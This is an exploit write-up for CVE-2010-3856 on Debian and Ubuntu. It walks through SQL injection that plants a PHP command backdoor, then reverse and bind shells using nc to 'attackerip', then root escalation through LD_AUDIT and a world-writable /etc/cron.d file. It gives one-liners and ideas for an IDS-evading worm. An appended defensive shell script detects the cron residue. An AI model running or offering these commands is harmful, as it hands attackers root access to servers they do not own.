Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856

--------------
| DISCLAIMER |
--------------
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

---------
| ABOUT |
---------
Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
distros too.

--------------
| BACKGROUND |
--------------
Typically it isn't possible to use a suid shell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root, and we can create a socket and connect back to the user or set up
a bindshell.

-----------
| EXPLOIT |
-----------
After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with a select into dumpfile/outfile statement.
The values are a simple backdoor.
---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (`fm` longblob) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---
Now you can connect to the server and create a connection with telnet, nc, write a
binary with perl -e ' print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...
If direct shell access isn't possible you can use php code to create your own
binary with php fwrite:
---
---
Now use Bind-Shell:
http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell:
http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash
in your webbrowser and connect to your shell
$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
---
Now let's exploit the DSO vuln. You need umask 0 for correct
rw-rw-rw creation of the exploit file /etc/cron.d/exploit
$ umask 0
This is the shellscript for the cron.d entry.
Bind-Shell:
$ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell:
$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
Now make your shellscript executable for cron:
$ chmod u+x /tmp/exploit.sh
Create a rw-rw-rw file in the cron directory using the setuid ping program:
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Launch a suid root shell every minute:
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
Now you have a root shell every minute.
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

-------------------
| EXPLOIT oneline |
-------------------
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------
Looks like a wormable bug. A URL-obfuscated (to evade IDS/IPS) worm searches for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil URL and does the same for other IPs. It installs a rootkit-bot and the game is over.

© Offensive Security 2010
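The cron.d step of this technique leaves two traces on disk that a defender can check for: a cron file that is group- or world-writable (the rw-rw-rw- file produced by umask 0 plus the LD_AUDIT/PCPROFILE_OUTPUT write) and a job whose command lives in a world-writable scratch directory such as /tmp. The following POSIX shell script is an added detection example, not part of the advisory or of exploit-db; the function names audit_cron_dir and make_sample_cron_dir, the sample cron entries, and the scratch-directory list are my assumptions.

```shell
#!/bin/sh
# Added defender-side check (not from the advisory above). It audits a cron.d-style
# directory for the two pieces of residue the technique leaves behind:
#   1. an entry file that is group- or world-writable, and
#   2. a job line whose command runs out of /tmp, /var/tmp or /dev/shm.
# Usage: audit_cron_dir /etc/cron.d
# Prints one line per finding; returns 1 if anything was found, 0 otherwise.

audit_cron_dir() {
    dir="$1"
    findings=0

    # 1. Permission check. POSIX find accepts symbolic modes for -perm:
    #    "-g+w" matches when the group write bit is set, "-o+w" the other bit.
    #    cron ignores file names with unusual characters, so word-splitting the
    #    result is acceptable here.
    for f in $(find "$dir" -maxdepth 1 -type f \( -perm -g+w -o -perm -o+w \) 2>/dev/null); do
        echo "WRITABLE: $f $(ls -ld "$f" | cut -d' ' -f1)"
        findings=$((findings + 1))
    done

    # 2. Content check. Ignore comment lines, flag commands under scratch paths
    #    (list of scratch directories is an assumption; extend it for your hosts).
    for f in $(grep -lE '^[^#].*(/tmp/|/var/tmp/|/dev/shm/)' "$dir"/* 2>/dev/null); do
        echo "SCRATCH-PATH: $f: $(grep -E '(/tmp/|/var/tmp/|/dev/shm/)' "$f" | head -n 1)"
        findings=$((findings + 1))
    done

    [ "$findings" -eq 0 ]
}

# Constructed sample directory (not a real system) so the check runs offline:
# one ordinary cron.d entry and one that reproduces the residue described above.
make_sample_cron_dir() {
    d=$(mktemp -d)
    printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/logrotate"
    chmod 0644 "$d/logrotate"
    printf '*/1 * * * * root /tmp/exploit.sh\n' > "$d/exploit"
    chmod 0666 "$d/exploit"
    echo "$d"
}
```

Run it against the constructed directory with `d=$(make_sample_cron_dir); audit_cron_dir "$d"`: the exploit entry is reported twice (once for its mode, once for the /tmp path) and the script exits 1, while the logrotate entry is silent. On a real host, point it at /etc/cron.d and pair it with a file-integrity baseline, since a fresh file appearing there is itself the signal.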